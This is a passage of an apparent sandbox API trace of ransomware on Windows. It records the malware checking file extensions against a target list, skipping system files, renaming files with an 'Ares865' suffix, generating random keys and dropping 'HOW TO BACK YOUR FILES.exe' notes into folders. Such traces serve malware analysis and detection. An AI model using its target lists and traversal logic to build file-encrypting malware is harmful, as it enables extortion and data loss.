lpString2="lgc") returned -1 [0050.057] lstrlenW (lpString="lwx") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0050.057] lstrlenW (lpString="maf") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0050.057] lstrlenW (lpString="maq") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0050.057] lstrlenW (lpString="mar") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0050.057] lstrlenW (lpString="marshal") returned 7 [0050.057] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0050.057] lstrlenW (lpString="mas") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0050.057] lstrlenW (lpString="mav") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0050.057] lstrlenW (lpString="maw") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0050.057] lstrlenW (lpString="mdbhtml") returned 7 [0050.057] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0050.057] lstrlenW (lpString="mdn") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0050.057] lstrlenW (lpString="mdt") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0050.057] lstrlenW (lpString="mfd") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0050.057] lstrlenW (lpString="mpd") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0050.057] lstrlenW (lpString="mrg") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0050.057] lstrlenW (lpString="mud") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0050.057] lstrlenW (lpString="mwb") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0050.057] lstrlenW (lpString="myd") returned 3 [0050.057] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0050.057] lstrlenW (lpString="ndf") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0050.058] lstrlenW (lpString="nnt") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0050.058] lstrlenW (lpString="nrmlib") returned 6 [0050.058] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0050.058] lstrlenW (lpString="ns2") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0050.058] lstrlenW (lpString="ns3") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0050.058] lstrlenW (lpString="ns4") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0050.058] lstrlenW (lpString="nsf") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0050.058] lstrlenW (lpString="nv") returned 2 [0050.058] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0050.058] lstrlenW (lpString="nv2") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0050.058] lstrlenW (lpString="nwdb") returned 4 [0050.058] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0050.058] lstrlenW (lpString="nyf") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0050.058] lstrlenW (lpString="odb") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0050.058] lstrlenW (lpString="odb") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0050.058] lstrlenW (lpString="oqy") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0050.058] lstrlenW (lpString="ora") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0050.058] lstrlenW (lpString="orx") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0050.058] lstrlenW (lpString="owc") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0050.058] lstrlenW (lpString="p96") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0050.058] lstrlenW (lpString="p97") returned 3 [0050.058] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0050.058] lstrlenW (lpString="pan") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0050.059] lstrlenW (lpString="pdb") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0050.059] lstrlenW (lpString="pdm") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0050.059] lstrlenW (lpString="pnz") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0050.059] lstrlenW (lpString="qry") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0050.059] lstrlenW (lpString="qvd") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0050.059] lstrlenW (lpString="rbf") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0050.059] lstrlenW (lpString="rctd") returned 4 [0050.059] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0050.059] lstrlenW (lpString="rod") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0050.059] lstrlenW (lpString="rodx") returned 4 [0050.059] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0050.059] lstrlenW (lpString="rpd") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0050.059] lstrlenW (lpString="rsd") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0050.059] lstrlenW (lpString="sas7bdat") returned 8 [0050.059] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0050.059] lstrlenW (lpString="sbf") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0050.059] lstrlenW (lpString="scx") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0050.059] lstrlenW (lpString="sdb") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0050.059] lstrlenW (lpString="sdc") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0050.059] lstrlenW (lpString="sdf") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0050.059] lstrlenW (lpString="sis") returned 3 [0050.059] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0050.060] lstrlenW (lpString="spq") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0050.060] lstrlenW (lpString="te") returned 2 [0050.060] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0050.060] lstrlenW (lpString="teacher") returned 7 [0050.060] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0050.060] lstrlenW (lpString="tmd") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0050.060] lstrlenW (lpString="tps") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0050.060] lstrlenW (lpString="trc") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0050.060] lstrlenW (lpString="trc") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0050.060] lstrlenW (lpString="trm") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0050.060] lstrlenW (lpString="udb") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0050.060] lstrlenW (lpString="udl") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0050.060] lstrlenW (lpString="usr") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0050.060] lstrlenW (lpString="v12") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0050.060] lstrlenW (lpString="vis") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0050.060] lstrlenW (lpString="vpd") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0050.060] lstrlenW (lpString="vvv") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0050.060] lstrlenW (lpString="wdb") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0050.060] lstrlenW (lpString="wmdb") returned 4 [0050.060] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0050.060] lstrlenW (lpString="wrk") returned 3 [0050.060] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0050.060] lstrlenW (lpString="xdb") returned 3 [0050.061] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0050.061] lstrlenW (lpString="xld") returned 3 [0050.061] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0050.061] lstrlenW (lpString="xmlff") returned 5 [0050.061] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0050.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\desktop.ini.Ares865") returned 41 [0050.061] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\desktop.ini" (normalized: "c:\\users\\public\\music\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Music\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\music\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0050.061] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\music\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0050.062] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=380) returned 1 [0050.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0050.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d6048 [0050.062] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0050.062] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0050.063] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0050.063] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0050.064] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x480, lpName=0x0) returned 0x164 [0050.102] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x480) returned 0x190000 [0050.102] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0050.103] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0050.103] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0050.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cba28 [0050.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0050.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2a28 [0050.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x320fc8 [0050.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2a28 | out: hHeap=0x2b0000) returned 1 [0050.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3210e0 [0050.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0050.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3210e0 | out: hHeap=0x2b0000) returned 1 [0050.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0050.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0050.104] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0050.104] CloseHandle (hObject=0x164) returned 1 [0050.104] CloseHandle (hObject=0x12c) returned 1 [0050.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6048 | out: hHeap=0x2b0000) returned 1 [0050.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0050.106] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0050.106] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4977eaa0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0050.106] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0050.106] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="aoldtz.exe") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2=".") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="..") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="windows") returned -1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="bootmgr") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="temp") returned -1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="pagefile.sys") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="boot") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="ids.txt") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="ntuser.dat") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="perflogs") returned 1 [0050.106] lstrcmpiW (lpString1="Sample Music", lpString2="MSBuild") returned 1 [0050.106] lstrlenW (lpString="Sample Music") returned 12 [0050.106] lstrlenW (lpString="C:\\Users\\Public\\Music\\desktop.ini") returned 33 [0050.106] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0050.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0050.106] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee970 [0050.106] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2e7c30 [0050.106] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0050.107] FindClose (in: hFindFile=0x2ccea8 | out: hFindFile=0x2ccea8) returned 1 [0050.107] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2528 [0050.107] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0050.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee970 | out: hHeap=0x2b0000) returned 1 [0050.107] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2520 | out: hHeap=0x2b0000) returned 1 [0050.107] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music") returned 34 [0050.107] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0050.107] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0050.107] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0050.107] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0050.107] GetLastError () returned 0x0 [0050.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x32cfb0 [0050.107] ReadFile (in: hFile=0x154, lpBuffer=0x32cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x32cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0050.107] CloseHandle (hObject=0x154) returned 1 [0050.108] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32cfb0 | out: hHeap=0x2b0000) returned 1 [0050.108] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.108] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0050.108] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0050.108] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0050.108] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.108] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x497a4c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x497a4c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.108] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0050.108] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0050.108] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.108] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.108] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0050.108] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0050.108] lstrlenW (lpString="desktop.ini") returned 11 [0050.108] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\*") returned 36 [0050.108] lstrcpyW (in: lpString1=0x2cce446, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0050.108] lstrlenW (lpString="desktop.ini") returned 11 [0050.109] lstrlenW (lpString="Ares865") returned 7 [0050.109] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0050.109] lstrlenW (lpString=".dll") returned 4 [0050.109] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0050.109] lstrlenW (lpString=".lnk") returned 4 [0050.109] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0050.109] lstrlenW (lpString=".ini") returned 4 [0050.109] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0050.109] lstrlenW (lpString=".sys") returned 4 [0050.109] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0050.109] lstrlenW (lpString="desktop.ini") returned 11 [0050.109] lstrlenW (lpString="bak") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0050.109] lstrlenW (lpString="ba_") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0050.109] lstrlenW (lpString="dbb") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0050.109] lstrlenW (lpString="vmdk") returned 4 [0050.109] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0050.109] lstrlenW (lpString="rar") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0050.109] lstrlenW (lpString="zip") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0050.109] lstrlenW (lpString="tgz") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0050.109] lstrlenW (lpString="vbox") returned 4 [0050.109] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0050.109] lstrlenW (lpString="vdi") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0050.109] lstrlenW (lpString="vhd") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0050.109] lstrlenW (lpString="vhdx") returned 4 [0050.109] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0050.109] lstrlenW (lpString="avhd") returned 4 [0050.109] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0050.109] lstrlenW (lpString="db") returned 2 [0050.109] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0050.109] lstrlenW (lpString="db2") returned 3 [0050.109] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0050.110] lstrlenW (lpString="db3") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0050.110] lstrlenW (lpString="dbf") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0050.110] lstrlenW (lpString="mdf") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0050.110] lstrlenW (lpString="mdb") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0050.110] lstrlenW (lpString="sql") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0050.110] lstrlenW (lpString="sqlite") returned 6 [0050.110] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0050.110] lstrlenW (lpString="sqlite3") returned 7 [0050.110] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0050.110] lstrlenW (lpString="sqlitedb") returned 8 [0050.110] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0050.110] lstrlenW (lpString="xml") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0050.110] lstrlenW (lpString="$er") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0050.110] lstrlenW (lpString="4dd") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0050.110] lstrlenW (lpString="4dl") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0050.110] lstrlenW (lpString="^^^") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0050.110] lstrlenW (lpString="abs") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0050.110] lstrlenW (lpString="abx") returned 3 [0050.110] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0050.110] lstrlenW (lpString="accdb") returned 5 [0050.110] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0050.110] lstrlenW (lpString="accdc") returned 5 [0050.110] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0050.110] lstrlenW (lpString="accde") returned 5 [0050.110] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0050.110] lstrlenW (lpString="accdr") returned 5 [0050.110] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0050.111] lstrlenW (lpString="accdt") returned 5 [0050.111] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0050.111] lstrlenW (lpString="accdw") returned 5 [0050.111] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0050.111] lstrlenW (lpString="accft") returned 5 [0050.111] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0050.111] lstrlenW (lpString="adb") returned 3 [0050.111] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0050.111] lstrlenW (lpString="adb") returned 3 [0050.111] lstrcmpiW 